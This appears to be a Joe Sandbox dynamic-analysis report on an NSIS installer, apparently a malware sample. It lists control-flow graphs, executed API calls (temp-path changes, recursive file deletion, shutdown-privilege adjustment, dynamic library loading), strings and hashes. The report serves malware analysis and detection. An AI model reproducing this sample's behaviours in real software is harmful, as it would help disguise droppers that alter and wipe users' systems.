5557->5603 5561 403d5d SendMessageA IsWindowEnabled 5558->5561 5564 403d7a 5558->5564 5559->5595 5560 404135 ShowWindow 5560->5595 5561->5564 5561->5595 5562 4041e2 8 API calls 5562->5595 5563 40618a 17 API calls 5563->5593 5565 403d87 5564->5565 5566 403d9a 5564->5566 5567 403dce SendMessageA 5564->5567 5575 403d7f 5564->5575 5565->5567 5565->5575 5569 403da2 5566->5569 5570 403db7 5566->5570 5567->5571 5568 404154 SendMessageA 5568->5571 5572 40140b 2 API calls 5569->5572 5573 40140b 2 API calls 5570->5573 5571->5562 5572->5575 5573->5575 5574 40417b 18 API calls 5574->5593 5575->5568 5575->5571 5576 40417b 18 API calls 5577 403f32 GetDlgItem 5576->5577 5578 403f47 5577->5578 5579 403f4f ShowWindow EnableWindow 5577->5579 5578->5579 5604 40419d EnableWindow 5579->5604 5581 403f79 EnableWindow 5586 403f8d 5581->5586 5582 403f92 GetSystemMenu EnableMenuItem SendMessageA 5583 403fc2 SendMessageA 5582->5583 5582->5586 5583->5586 5585 403c88 18 API calls 5585->5586 5586->5582 5586->5585 5605 4041b0 SendMessageA 5586->5605 5606 4060f7 lstrcpynA 5586->5606 5588 403ff1 lstrlenA 5589 40618a 17 API calls 5588->5589 5590 404002 SetWindowTextA 5589->5590 5591 401389 2 API calls 5590->5591 5591->5593 5592 404046 DestroyWindow 5594 404060 CreateDialogParamA 5592->5594 5592->5603 5593->5556 5593->5557 5593->5563 5593->5574 5593->5576 5593->5592 5593->5595 5596 404093 5594->5596 5594->5603 5597 40417b 18 API calls 5596->5597 5598 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5597->5598 5599 401389 2 API calls 5598->5599 5600 4040e4 5599->5600 5600->5595 5601 4040ec ShowWindow 5600->5601 5602 4041c7 SendMessageA 5601->5602 5602->5603 5603->5560 5603->5595 5604->5581 5605->5586 5606->5588 4768 40272b 4769 402732 4768->4769 4775 4029aa 4768->4775 4770 402bac 17 API calls 4769->4770 4771 402739 4770->4771 4772 402748 SetFilePointer 4771->4772 4773 402758 4772->4773 4772->4775 4776 406055 wsprintfA 4773->4776 4776->4775 4787 401c2e 4788 402bac 17 API calls 4787->4788 4789 401c35 4788->4789 4790 402bac 17 API calls 4789->4790 4791 401c42 4790->4791 4792 401c57 4791->4792 4793 402bce 17 API calls 4791->4793 4794 402bce 17 API calls 4792->4794 4798 401c67 4792->4798 4793->4792 4794->4798 4795 401c72 4799 402bac 17 API calls 4795->4799 4796 401cbe 4797 402bce 17 API calls 4796->4797 4800 401cc3 4797->4800 4798->4795 4798->4796 4801 401c77 4799->4801 4803 402bce 17 API calls 4800->4803 4802 402bac 17 API calls 4801->4802 4804 401c83 4802->4804 4805 401ccc FindWindowExA 4803->4805 4806 401c90 SendMessageTimeoutA 4804->4806 4807 401cae SendMessageA 4804->4807 4808 401cea 4805->4808 4806->4808 4807->4808 5607 4042b1 lstrcpynA lstrlenA 4815 401e35 GetDC 4816 402bac 17 API calls 4815->4816 4817 401e47 GetDeviceCaps MulDiv ReleaseDC 4816->4817 4818 402bac 17 API calls 4817->4818 4819 401e78 4818->4819 4820 40618a 17 API calls 4819->4820 4821 401eb5 CreateFontIndirectA 4820->4821 4822 402620 4821->4822 5608 402a35 SendMessageA 5609 402a5a 5608->5609 5610 402a4f InvalidateRect 5608->5610 5610->5609 5611 4014b7 5612 4014bd 5611->5612 5613 401389 2 API calls 5612->5613 5614 4014c5 5613->5614 5615 402dba 5616 402dc9 SetTimer 5615->5616 5618 402de2 5615->5618 5616->5618 5617 402e37 5618->5617 5619 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5618->5619 5619->5617 4869 4015bb 4870 402bce 17 API calls 4869->4870 4871 4015c2 4870->4871 4872 405b28 4 API calls 4871->4872 4886 4015ca 4872->4886 4873 401624 4875 401629 4873->4875 4877 401652 4873->4877 4874 405aba CharNextA 4874->4886 4876 401423 24 API calls 4875->4876 4879 401630 4876->4879 4878 401423 24 API calls 4877->4878 4885 40164a 4878->4885 4888 4060f7 lstrcpynA 4879->4888 4880 405761 2 API calls 4880->4886 4882 40577e 5 API calls 4882->4886 4883 40163b SetCurrentDirectoryA 4883->4885 4884 40160c GetFileAttributesA 4884->4886 4886->4873 4886->4874 4886->4880 4886->4882 4886->4884 4887 4056e4 4 API calls 4886->4887 4887->4886 4888->4883 5620 4016bb 5621 402bce 17 API calls 5620->5621 5622 4016c1 GetFullPathNameA 5621->5622 5623 4016d8 5622->5623 5629 4016f9 5622->5629 5625 40646b 2 API calls 5623->5625 5623->5629 5624 40170d GetShortPathNameA 5626 402a5a 5624->5626 5627 4016e9 5625->5627 5627->5629 5630 4060f7 lstrcpynA 5627->5630 5629->5624 5629->5626 5630->5629

                                                          Executed Functions

                                                          Function 00403348 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 7 403393 1->7 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 7->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 21 4033da 17->21 21->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 32 403470-403478 29->32 33 40346a-40346e 29->33 31 403542-40355c GetTempPathA call 403317 30->31 42 4035b4-4035ce DeleteFileA call 402ea1 31->42 43 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 31->43 34 403480-403483 32->34 35 40347a-40347b 32->35 33->32 33->33 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 57 403524 37->57 40 4034a5-4034d2 38->40 41 40348f-403495 38->41 47 4034d4-4034da 40->47 48 4034e5-403513 40->48 45 403497-403499 41->45 46 40349b 41->46 60 403662-403672 call 403830 OleUninitialize 42->60 61 4035d4-4035da 42->61 43->42 59 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 43->59 45->40 45->46 46->40 52 4034e0 47->52 53 4034dc-4034de 47->53 48->37 55 403531-40353d call 4060f7 48->55 52->48 53->48 53->52 55->31 57->28 59->42 59->60 72 403796-40379c 60->72 73 403678-403688 call 405813 ExitProcess 60->73 62 403652-403659 call 40390a 61->62 63 4035dc-4035e7 call 405aba 61->63 70 40365e 62->70 74 4035e9-403612 63->74 75 40361d-403627 63->75 70->60 77 403818-403820 72->77 78 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->78 79 403614-403616 74->79 82 403629-403636 call 405b7d 75->82 83 40368e-4036a2 call 40577e lstrcatA 75->83 80 403822 77->80 81 403826-40382a ExitProcess 77->81 85 4037e9-4037f7 call 406500 78->85 86 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 403618-40361b 79->87 80->81 82->60 94 403638-40364e call 4060f7 * 2 82->94 95 4036a4-4036aa lstrcatA 83->95 96 4036af-4036c9 lstrcatA lstrcmpiA 83->96 97 403805-40380f ExitWindowsEx 85->97 98 4037f9-403803 85->98 86->85 87->75 87->79 94->62 95->96 96->60 101 4036cb-4036ce 96->101 97->77 99 403811-403813 call 40140b 97->99 98->97 98->99 99->77 105 4036d0-4036d5 call 4056e4 101->105 106 4036d7 call 405761 101->106 111 4036dc-4036e9 SetCurrentDirectoryA 105->111 106->111 113 4036f6-40371e call 4060f7 111->113 114 4036eb-4036f1 call 4060f7 111->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 123 40378a-403791 call 405ed6 121->123 122->121 124 403754-403774 call 405ed6 call 40618a call 405796 122->124 123->60 124->121 133 403776-40377d CloseHandle 124->133 133->121
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                          • GetVersion.KERNEL32 ref: 00403373
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                          • GetCommandLineA.KERNEL32(hyaenic Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",00000020,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75A53410), ref: 004039FA
                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                            • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                            • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(000002E0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\fbXZ4ErQMU.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fbXZ4ErQMU.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$hyaenic Setup$~nsu
                                                          • API String ID: 3776617018-2629657530
                                                          • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                          • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                          Function 70051A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 70051215: GlobalAlloc.KERNEL32(00000040,70051233,?,700512CF,-7005404B,700511AB,-000000A0), ref: 7005121D
                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 70051BC4
                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 70051C0C
                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 70051C16
                                                          • GlobalFree.KERNEL32(00000000), ref: 70051C29
                                                          • GlobalFree.KERNEL32(?), ref: 70051D09
                                                          • GlobalFree.KERNEL32(?), ref: 70051D0E
                                                          • GlobalFree.KERNEL32(?), ref: 70051D13
                                                          • GlobalFree.KERNEL32(00000000), ref: 70051EFA
                                                          • lstrcpyA.KERNEL32(?,?), ref: 70052098
                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 70052114
                                                          • LoadLibraryA.KERNEL32(00000008), ref: 70052125
                                                          • GetProcAddress.KERNEL32(?,?), ref: 7005217E
                                                          • lstrlenA.KERNEL32(00000408), ref: 70052198
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: c7f186199c54d81a8f1d0b4fe8abc9ab145923d84785cfa3d3b5e1acd825844b
                                                          • Instruction ID: 85cf1a9b3a51f13507241d1333a4164faac9c6432316035a486a2ecc521134f0
                                                          • Opcode Fuzzy Hash: c7f186199c54d81a8f1d0b4fe8abc9ab145923d84785cfa3d3b5e1acd825844b
                                                          • Instruction Fuzzy Hash: 5522AC71D04609DEDB228FB4C885BEEBBFAFF05B24F20452ED192E2281D7745989CB50
                                                          Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 558 4058bf-4058e5 call 405b7d 561 4058e7-4058f9 DeleteFileA 558->561 562 4058fe-405905 558->562 563 405a88-405a8c 561->563 564 405907-405909 562->564 565 405918-405928 call 4060f7 562->565 566 405a36-405a3b 564->566 567 40590f-405912 564->567 571 405937-405938 call 405ad6 565->571 572 40592a-405935 lstrcatA 565->572 566->563 570 405a3d-405a40 566->570 567->565 567->566 573 405a42-405a48 570->573 574 405a4a-405a52 call 40646b 570->574 576 40593d-405940 571->576 572->576 573->563 574->563 581 405a54-405a68 call 405a8f call 405877 574->581 579 405942-405949 576->579 580 40594b-405951 lstrcatA 576->580 579->580 582 405956-405974 lstrlenA FindFirstFileA 579->582 580->582 597 405a80-405a83 call 40521e 581->597 598 405a6a-405a6d 581->598 584 40597a-405991 call 405aba 582->584 585 405a2c-405a30 582->585 591 405993-405997 584->591 592 40599c-40599f 584->592 585->566 587 405a32 585->587 587->566 591->592 594 405999 591->594 595 4059a1-4059a6 592->595 596 4059b2-4059c0 call 4060f7 592->596 594->592 599 4059a8-4059aa 595->599 600 405a0b-405a1d FindNextFileA 595->600 608 4059c2-4059ca 596->608 609 4059d7-4059e2 call 405877 596->609 597->563 598->573 602 405a6f-405a7e call 40521e call 405ed6 598->602 599->596 604 4059ac-4059b0 599->604 600->584 606 405a23-405a26 FindClose 600->606 602->563 604->596 604->600 606->585 608->600 611 4059cc-4059d5 call 4058bf 608->611 617 405a03-405a06 call 40521e 609->617 618 4059e4-4059e7 609->618 611->600 617->600 620 4059e9-4059f9 call 40521e call 405ed6 618->620 621 4059fb-405a01 618->621 620->600 621->600
                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                          • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                          • "C:\Users\user\Desktop\fbXZ4ErQMU.exe", xrefs: 004058BF
                                                          • \*.*, xrefs: 0040592A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-948675963
                                                          • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                          • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                          Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                          • API String ID: 123533781-2736763094
                                                          • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                          • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                          Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(75A53410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                          • FindClose.KERNELBASE(00000000), ref: 00406482
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                          Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                          • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                          • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                          • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                          Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 146 40398a-4039b3 call 403bcf call 405b7d 137->146 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->146 152 4039b9-4039be 146->152 153 403a3a-403a42 call 405b7d 146->153 152->153 154 4039c0-4039e4 call 405fde 152->154 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 168 4039f9-403a05 lstrlenA 161->168 169 4039ea-4039f7 call 405aba 161->169 176 403b00-403b03 163->176 177 403b08-403b13 call 403bcf 163->177 165 403bc5 164->165 166 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->166 174 403bc7-403bce 165->174 166->163 170 403a07-403a15 lstrcmpiA 168->170 171 403a2d-403a35 call 405a8f call 4060f7 168->171 169->168 170->171 175 403a17-403a21 GetFileAttributesA 170->175 171->153 180 403a23-403a25 175->180 181 403a27-403a28 call 405ad6 175->181 176->174 187 403b19-403b33 ShowWindow call 406492 177->187 188 403b9c-403ba4 call 4052f0 177->188 180->171 180->181 181->171 195 403b35-403b3a call 406492 187->195 196 403b3f-403b51 GetClassInfoA 187->196 193 403ba6-403bac 188->193 194 403bbe-403bc0 call 40140b 188->194 193->176 197 403bb2-403bb9 call 40140b 193->197 194->165 195->196 200 403b53-403b63 GetClassInfoA 